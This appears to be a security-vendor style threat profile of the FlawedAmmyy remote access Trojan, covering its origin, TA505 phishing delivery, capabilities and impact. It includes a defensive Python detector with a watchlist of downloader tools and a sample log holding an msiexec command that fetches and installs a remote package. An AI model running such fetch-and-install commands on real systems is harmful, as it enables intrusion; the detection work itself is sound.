
  • Threat Type: Backdoor

  • Destructiveness: No

  • In the wild: Yes

  OVERVIEW

FlawedAmmyy is a remote access Trojan (RAT) built from leaked source code of Ammyy Admin, a legitimate remote administration tool used for remote control and diagnostics of Microsoft Windows machines. The RAT retains the functionality of the leaked version, including remote desktop control, a file system manager, proxy support and audio chat.

FlawedAmmyy has been used in broad phishing campaigns, apparently to build a large base of compromised computers, and in targeted campaigns that give the actors an opportunity to steal customer data, proprietary information and more. In its latest campaign, TA505, a group known for attacks on multiple financial institutions and retail companies, began using HTML attachments to deliver malicious .XLS files that lead to a downloader and then to the FlawedAmmyy backdoor, mostly affecting users in South Korea.
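The delivery chain above (HTML attachment, then a malicious .XLS, then a downloader) gives a defender one reliable choke point: the spreadsheet has to make Excel start something that fetches the next stage. The script below is an added example, not code from this page or from Trend Micro, that applies that heuristic to process-creation events. It assumes, as a general rule rather than anything stated on the page, that "leads to a downloader" means Excel spawning a script host, installer or shell, often with a URL on the command line. The log lines, their `key=value|...` layout and the `example.invalid` host are constructed for the example.

```python
"""Process-creation heuristic for Office-delivered downloaders.

Assumption (not from the page): a malicious .XLS that "leads to a
downloader" does so by making Excel spawn a child process that fetches
the next stage. The event format below is a simplified, constructed
Sysmon Event ID 1 (process create) rendered as 'key=value' pairs
separated by '|'; command lines in the sample contain no '|'.
"""
import re
from dataclasses import dataclass

# Office applications that should almost never spawn the children below.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}

# Common second-stage fetchers / script hosts (hypothetical watchlist;
# tune to the environment).
DOWNLOADER_CHILDREN = {
    "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "msiexec.exe", "rundll32.exe", "regsvr32.exe",
    "certutil.exe", "bitsadmin.exe",
}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    parent: str
    child: str
    reason: str


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> dict:
    """Split one constructed 'k=v|k=v' event line into a dict."""
    fields = {}
    for part in line.split("|"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def evaluate(lines) -> list:
    """Flag Office parents spawning downloader-style children."""
    findings = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        if ev.get("EventID") != "1":  # only process-create events
            continue
        parent = _basename(ev.get("ParentImage", ""))
        child = _basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        if parent not in OFFICE_PARENTS:
            continue
        has_url = bool(URL_RE.search(cmd))
        if child in DOWNLOADER_CHILDREN:
            reason = "office app spawned script host/installer"
            if has_url:
                reason += " with URL on command line"
            findings.append(Finding(n, parent, child, reason))
        elif has_url:
            # Unknown child, but a URL argument from an Office parent is odd.
            findings.append(Finding(n, parent, child,
                                    "office child process with URL on command line"))
    return findings


# Constructed sample log: one Excel-launched MSI fetch, one benign Excel
# helper, one non-process event, one Excel-launched shell without a URL.
SAMPLE_LOG = [
    r"EventID=1|Image=C:\Windows\System32\msiexec.exe|ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|CommandLine=msiexec.exe /q /i http://example.invalid/stage2.msi",
    r"EventID=1|Image=C:\Windows\splwow64.exe|ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|CommandLine=splwow64.exe 12288",
    r"EventID=3|Image=C:\Windows\System32\msiexec.exe|DestinationIp=192.0.2.10|DestinationPort=80",
    r"EventID=1|Image=C:\Windows\System32\cmd.exe|ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|CommandLine=cmd.exe /c start %TEMP%\update.exe",
]


if __name__ == "__main__":
    for f in evaluate(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.parent} -> {f.child}: {f.reason}")
```

The benign `splwow64.exe` line shows why the rule keys on the child's name and command line rather than on "Excel spawned anything": Office applications do start helper processes during normal printing and add-in activity, so an unconditional parent-child alert would be noisy.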

Upon infection, the RAT can enable potential attackers to perform a variety of malicious activities such as:

  • gain complete access to the PC's camera and microphone

  • capture screenshots

  • access a variety of services and steal files and credentials

  • steal customer data, proprietary information, etc.

It is capable of the following:

  • Information Theft

  • Backdoor commands

Possible impact of FlawedAmmyy includes:

  • Financial loss

  • Compromised system security

  • Violation of user privacy

FlawedAmmyy typically follows the infection chain below: